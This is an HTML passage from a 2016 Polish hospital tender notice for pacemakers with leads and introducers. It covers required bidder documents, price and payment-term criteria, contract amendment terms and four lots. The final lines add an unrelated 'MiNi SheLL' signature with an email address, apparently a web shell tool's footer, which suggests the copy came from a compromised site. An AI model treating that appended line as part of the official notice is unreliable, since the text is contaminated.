<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań na potwierdzenie spełniania tego warunku udziału w postępowaniu. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokonana na podstawie złożonych dokumentów i oświadczeń stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 uPzp, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań na potwierdzenie spełniania tego warunku udziału w postępowaniu. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokonana na podstawie złożonych dokumentów i oświadczeń stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 uPzp, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań na potwierdzenie spełniania tego warunku udziału w postępowaniu. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokonana na podstawie złożonych dokumentów i oświadczeń stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 uPzp, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Formularz parametrów wymaganych, zgodnie z załącznikiem nr 7 do SIWZ.
2. Formularz minimalnego stanu zapasów, zgodnie z załącznikiem nr 8 do SIWZ.
3. Aktualne dokumenty potwierdzające, że oferowany przedmiot zamówienia jest dopuszczony do obrotu i do używania zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (t.j. Dz. U. z 2015 r., poz. 876) w formie:
a) deklaracji zgodności CE, chyba że ustawa o wyrobach medycznych stanowi inaczej,
b) dokumentu potwierdzającego dokonanie odpowiednio zgłoszenia lub powiadomienia o wprowadzeniu wyrobu medycznego do obrotu, chyba że ustawa o wyrobach medycznych stanowi inaczej,
c) dokumentu potwierdzającego przeprowadzenie procedury oceny zgodności wyrobu medycznego z wymaganiami zasadniczymi (certyfikat zgodności wydany przez jednostkę notyfikowaną, uczestniczącą w ocenie zgodności), chyba że ustawa o wyrobach medycznych stanowi inaczej.
Uwaga! W przypadku, gdy ustawa o wyrobach medycznych stanowi inaczej i dopuszcza inne dokumenty, niż wymienione w lit. a-c powyżej, Wykonawca zobowiązany jest złożyć dokument równoważny dokumentowi wymaganemu, zgodnie z ustawą o wyrobach medycznych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, zgodnie z załącznikiem nr 1 do SIWZ.
2. Formularz cenowy, zgodnie z załącznikiem nr 2 do SIWZ.
3. Instrukcja składowania zapasu konsygnacyjnego.
4. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać w szczególności dane ustanowionego pełnomocnika oraz zakres jego umocowania.
5. Oświadczenia i dokumenty Wykonawców występujących wspólnie:
1) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz załączyć do oferty pełnomocnictwo. Pełnomocnictwo musi być załączone do oferty w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo musi zawierać w szczególności: wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.
2) Wykonawcy występujący wspólnie muszą złożyć wszystkie wymagane oświadczenia i dokumenty, z tym że oświadczenia i dokumenty wymagane przez Zamawiającego w celu wykazania braku podstaw do wykluczenia Wykonawcy z postępowania składa każdy Wykonawca z osobna, natomiast pozostałe dokumenty muszą potwierdzać spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego wspólnie, z zastrzeżeniem art. 26 ust. 2b ustawy Pzp.
6. Tajemnica przedsiębiorstwa:
1) Wykonawca może zastrzec w ofercie jako tajne takie informacje, które stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
2) Zastrzeżenie informacji jako tajne musi nastąpić nie później niż w terminie składania ofert.
3) Na Wykonawcy spoczywa obowiązek wykazania, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. W wypadku, gdy Wykonawca nie wykaże zasadności zastrzeżenia informacji, informacje te zostaną odtajnione.
4) Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień umowy w stosunku do treści oferty w przypadku, gdy:
1) nastąpi obniżenie ceny;
2) nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto, wraz z konsekwencjami rachunkowymi, w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę. Zmiana związana ze zmianą wysokości minimalnego wynagrodzenia za pracę może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę wysokości wynagrodzenia minimalnego za pracę. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji art. 142 ust. 5 pkt 2 ustawy Pzp oraz wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego rozstrzygnięcia spełnienia przesłanek opisanych w art. 142 ust. 5 ustawy Pzp;
3) nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne -  Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto, wraz z konsekwencjami rachunkowymi, w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Zmiana związana ze zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji art. 142 ust. 5 pkt 3 ustawy Pzp oraz wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego rozstrzygnięcia spełnienia przesłanek opisanych w art. 142 ust. 5 ustawy Pzp;
4) nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji art. 142 ust. 5 pkt 1 ustawy Pzp, w tym także wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego rozstrzygnięcia spełnienia przesłanek opisanych w art. 142 ust. 5 ustawy Pzp;
5) nastąpią zmiany osób wskazanych przez Strony do realizacji umowy;
6) nastąpi zmiana nazwy handlowej, numeru katalogowego lub innego oznaczenia towaru nie powodująca zmiany przedmiotu umowy;
7) umowa nie zostanie zrealizowana do wartości brutto w terminie jej obowiązywania - czas trwania umowy może zostać wydłużony aż do wyczerpania wartości brutto, jednak nie dłużej niż o 6 miesięcy.
2. Zamawiający dopuszcza także, w szczególnych sytuacjach i za jego pisemną zgodą, w trakcie trwania umowy, zmianę towaru dostarczanego przez Wykonawcę, w szczególności w sytuacji, gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ. Zamawiający zastrzega, iż cena towaru zamiennego nie może przekraczać ceny towaru zamienianego. W przypadku zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szpital.wloclawek.pl/przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. błogosławionego ks. Jerzego Popiełuszki we Włocławku, ul. Wieniecka 49, 87-800 Włocławek, Dział Zamówień Publicznych, pokój 303/304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2016 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. błogosławionego ks. Jerzego Popiełuszki we Włocławku, ul. Wieniecka 49, 87-800 Włocławek, Dział Zamówień Publicznych, pokój 303/304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 30 stymulatorów SSIR wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego. Pozostała część opisu przedmiotu zamówienia dotycząca niniejszej części znajduje się w Sekcji II.1.4 niniejszego ogłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7, 33.18.22.00-1, 33.18.22.40-3, 22.99.32.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 10 stymulatorów SSIR pro MRI wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego. Pozostała część opisu przedmiotu zamówienia dotycząca niniejszej części znajduje się w Sekcji II.1.4 niniejszego ogłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7, 33.18.22.00-1, 33.18.22.40-3, 22.99.32.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 90 stymulatorów DDDR dwujamowych wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego. Pozostała część opisu przedmiotu zamówienia dotycząca niniejszej części znajduje się w Sekcji II.1.4 niniejszego ogłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7, 33.18.22.00-1, 33.18.22.40-3, 22.99.32.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 30 stymulatorów DDDR dwujamowych pro MRI wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego. Pozostała część opisu przedmiotu zamówienia dotycząca niniejszej części znajduje się w Sekcji II.1.4 niniejszego ogłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7, 33.18.22.00-1, 33.18.22.40-3, 22.99.32.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com